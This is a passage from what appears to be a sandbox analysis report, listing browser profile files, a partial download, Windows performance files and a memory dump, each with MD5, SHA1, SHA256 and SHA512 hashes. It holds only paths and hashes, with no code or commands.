| SHA512 | 98711c966cb87c168238b06a606ea2881de3d1cd3c40dfd498a6f5e44aca40310f86e0ee4f86a1e37e103ff0e5a97fa759e4e42615a2f106ae9ea4ea2587f141 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3280f915079ab7b66babcb6c05acaae6 |
| SHA1 | c93e6c80c788a2cd62ec0b76fda5e153f0489735 |
| SHA256 | 359d685e1d007b56a3c7dd5cb7a1537b3293793464b2c134667bdb2742acffc1 |
| SHA512 | de021a557d69929fecfdc3c02afd6020bc34a7af3bd79fcb1a9823ce56e773ef2a2eb78c09a2448eb0c4d68692f8ac5cf5edf3f09a63bac2730b71460fb54ec9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 9b6df409d8dec31ad1c9f06adddc707a |
| SHA1 | 082814c7329f6c74a657fc962619f18c99833ca6 |
| SHA256 | 36a41c7affe60180809b802fc809360f483e509906d2cb182b60a9ba37a5f36d |
| SHA512 | b356670c80f14c61863140fa8022053212d97981b2ca540ab1259eaf5a464022f2044ac2272189f465c61725e46122cf7100bbfc77c82a0517c3e38b1e72b9a8 |
C:\Users\Admin\Downloads\Unconfirmed 86727.crdownload
| MD5 | 605a4a8e0fb61ed99f7243582033ca2a |
| SHA1 | 286bcdc998c85a7a5c73fe9a3d207d3b93f154da |
| SHA256 | 203de717064532e1b79c1b3eb0c0ea35637462b294707c6cb09a45ae4999074e |
| SHA512 | a07c13c99786408b549feb25e09b7e9f4efb86243878e2fca398f498b7a5a55428fd3f106b8b592ee34a6c41fdcd5765cb3e761aa33b092b811e3312348b28d8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 485ce0e8f40c104750af3053b3abda56 |
| SHA1 | fd54259a71c18265b40e1c81045d9fcfdbc25043 |
| SHA256 | 1047a1f1a2ad083b4b8369329119c28f9b24e2ca242b9144366a082b4e236976 |
| SHA512 | 0b066c179ffe2f9b1136e14ba0dc42255a10fe5081bfa7ba1b5c82f797371d91cca1b32e413cce0b50ffc0918c50e21f53c9f15d593f1bc2fd8912b90f93164a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 269ff70128428072eadf4a7ddbc55b74 |
| SHA1 | 4177f375b449298a52b3eef670cf7571877971f9 |
| SHA256 | 72f224d7e618362fb5cbd99cdbb17f8438da7259f401ddb58843e261d3537828 |
| SHA512 | a13c93e036933beec5fb6dc416ffaea26a0fae82c76ab3b174eecf0b0b25a3c5e562b607bb4281cdb53f17ce2a0dde9aaa705aa32694d8da421c4d6d86a43f2c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 6e4e5ac683f85d430b5be8fa037cebd2 |
| SHA1 | 03d3831cbfcee372f975d124262ccd66d966bbc0 |
| SHA256 | ace340bb32c1f84c11c9a3939d1bbc2e0dc5430498b6b1a90cd8b91ff94d170c |
| SHA512 | 8be27903a4f4f9352b2468220b146bf8d67197e36456d480303ffca624516020fa1d4b645b85c01d4c66ea5047f57931834b1e7c23efad9291147ea7b198dd96 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 4562bc76ad3602447fe0a11b8ab7a6ea |
| SHA1 | 0e2e9370b187eabbee56ef1a97452c6d51ecb6a8 |
| SHA256 | 22d3a06cbb0aa3a168b7eeba9a51ce6a72f1bbeab77b21e2423073c2583bfef7 |
| SHA512 | 8c21ef7157fce6fcee9fb3c441a8e9cad669b10d45182fddc21a94edd902609f7d62c2e4e148f270242e2ec32408525920a1d671effe26137a6b7368530f5edd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 61ee6d9d5fa28aea7127cfc676cd43e1 |
| SHA1 | 7f3c59d8a6e8cbc0fac5545da1eb3f5831b43472 |
| SHA256 | f2676e73681ffc823de10908723a17b46282f47dad2f744f634764e76d12480c |
| SHA512 | c6f61800bb13b527c2bb4ceba085d4af44a6d304b7da640d39487556cb2aa059469a537815a8fd3c86382b253cae9bce528a80447aa278e5d1cfc7cb8c2b2fab |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 39aa0563fdbb0284e43887d5c219bfbb |
| SHA1 | 7db94d24a5af2b255395ef450a584fde99dc6037 |
| SHA256 | 7257f5d263ff1a0d007ace4897b886cfc99799448bd1cb99fb881107b8c44c92 |
| SHA512 | 65ec34d800bf1874ee7187f741e284f3800269b07e9f42ab485736d64e837e1b2407199a85a29a632dd024c28d4dfd452cb7915f7594778e55d0b10f4ab111af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | db91d3888b93290a4e5a207b5f4bd7ce |
| SHA1 | 7b9ebc03dda9902ef4d8e90ee8657a4408eed893 |
| SHA256 | 8398ce5d691fa10fbfaf777f24d72d8b944a8f22166e929524bb9ca28201b213 |
| SHA512 | f6e0c7c649baa7ac69f54d7341bb2c6095c55e461138b29192b847a9a78b7fcd1c47c43dd8ab7dbeac6339eb62aa7b189133cf585742073a192db19210174dae |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8a33caa5fa60541cff7ee0b997de23c4 |
| SHA1 | b63ca80cd7210dcb6ee423f16c2496fb55137be4 |
| SHA256 | 9bfaa47764089c1d36329735ba8e08f8996f90a9fea4d803f3dcdfea314a50ff |
| SHA512 | f705b40b84f55aaf90a3d43611c866714aed73a89639609120acd2e4618bf911e14a4ab271fea16b80a8210586ccc64e9675ba61717421e3ba6f62463b7bd781 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0687b5d89dc79ccb00159b338dc33549 |
| SHA1 | 99a6d12a4f339dc7439aa8140a8a0b0a4b26bae9 |
| SHA256 | bd3953c0399560ef333ff9dd36b8dca792ef2b7d1afa59a59f39b0506f4bf2a9 |
| SHA512 | 78c09e3f9712c941aa359f3e84889afcf7de6ed819d640006f49f9e94e1e2b562edeccb47b34fb4f6fda587e4636dcd1b4f6de3e47620f64c482ada6d0057e7a |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | aff1f8d423eea1ceb09dfcc08397676a |
| SHA1 | 4d170d6858792a13873be98334dec639a6dfc232 |
| SHA256 | 418d5803e63d54fb2bf4a3cc6db5628ad912259c032787b2bd3ff19c23b506c7 |
| SHA512 | bb5c5962976f8929e13ba97a23b5f68b39f8666d6c69aed153ed07c393825c18065df9df155aa9710a520816b2827735d47162ff8232289ddfa87fcf254ce54d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 6e25871e8a4f9c38d217ef7745541d88 |
| SHA1 | 0dbc525b1ca79bb3c3756fbe18ac158922408cce |
| SHA256 | ca75c8d382ceb736603bbf2be779f03e4fa009240d84566a5a1e211e749f8b1b |
| SHA512 | f50ddcca807916bf1a2452375c23e6ac8e609fb887f66d36f428dbccbed0c1c20aa59576f9e20e58f61ca21d1d2531b074619be175d301303f17bafd93810254 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 4b2175b18f44df5c07ff55b671960eca |
| SHA1 | e0a41ba78c8adbd754e56286370924a45be6e41c |
| SHA256 | accf0ba5aeb1c0d9a561e953fb7d0491adf44ef9f7c8ee964fe7f0d080c2f198 |
| SHA512 | 9b1d825a7e47bf1b37b0908a1c438050d2af1abb8d4e0074cd648f0f2e5d9cd7386c0a8f688029d6c9c18f481c10363de81ee2969a465cdd9149f33b2e646e95 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 92d98b217ed7dd1bb497b8e78417b809 |
| SHA1 | 32524f744e22fbe7f33b176af9ecf0545a810c31 |
| SHA256 | 264be3333c22da99de2c2b6c992f29ec85e0eba486cb11723eaa568bb21ec7cc |
| SHA512 | 685a370a2ec027ced874147d52024dc338d192e69e04eab9908131ce77e995990999e530303ff8bf81509bed927fc57f243cbde465dbd1ba9e36dcb6916a4356 |
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\TransportSecurity
| MD5 | 775cd0b7e74fcd4d16550f5a8fcff73a |
| SHA1 | 4276f6b8c616f200e8c0628829817f7801f46ed0 |
| SHA256 | 1f2e0108962ddb14c8ffb7bd3c483714a937bb6cbb0cc71de991a1638bd73582 |
| SHA512 | 5738e1a169d1f1f5669b0eeb8be7c2221ec2e56babef2ebf6b25b896167655eb4a6e0dcdbeb042ebb28c05b6fdc37c4706a08ea4a35e0d97b68118f3370393bf |
C:\Windows\System32\perfh009.dat
| MD5 | f192a9b0239e7d1d68f82eabd1583521 |
| SHA1 | fee3eba81cd25dea75d0e6636ad5e29f3a842a71 |
| SHA256 | ecb0d867b62ff62be4153970ffc4ed353493f8b5d003c8e2f716a0ac56ca0194 |
| SHA512 | ccd860f7d415e070d06e86d32ae1b315c47c4bb5677275e2d75092a796abc75e8bd37db90726a041d96da9fb843524c30d6ad765004baf54900ea4ea3c46d81e |
C:\Windows\System32\perfc009.dat
| MD5 | 31b0b43206c3924d306a6342c6b2f0d2 |
| SHA1 | a493e0a346c86ea02232f5849a00d1b1b8df14f4 |
| SHA256 | 8a820f95ee0f8ab0c116286d21087195b0eca2fcd89bc46e55342e99302e72dc |
| SHA512 | d63dd3092dd7a033ac3d3a44b3f736175f8b8b29c12a8e9a6f707d4a2178ba250a55cced5a53e32181c75811324e9c1f2bf03f75998b39da1d9199c3e1dda3ca |
memory/1604-4966-0x0000000072E40000-0x0000000072ECA000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\Pandora\Default\Network\Network Persistent State
| MD5 | 9c818deafac3be2266e8435aac2e4a55 |
| SHA1 | bc60ea5cc16c36967f71b87a1973fca423c1faad |
| SHA256 | 2ce91548cd5a9d174c369c376c34e44b8ff8389701b5bc1c00df1b6935ab0154 |
| SHA512 | d8415a0b3cd276680c402628bda0e4a66e900847eebaea8158595d9daefc6224eb2ecfaf0ed81038117c88f1217c73e60bf88bb91936d95564dd478bff19d0ca |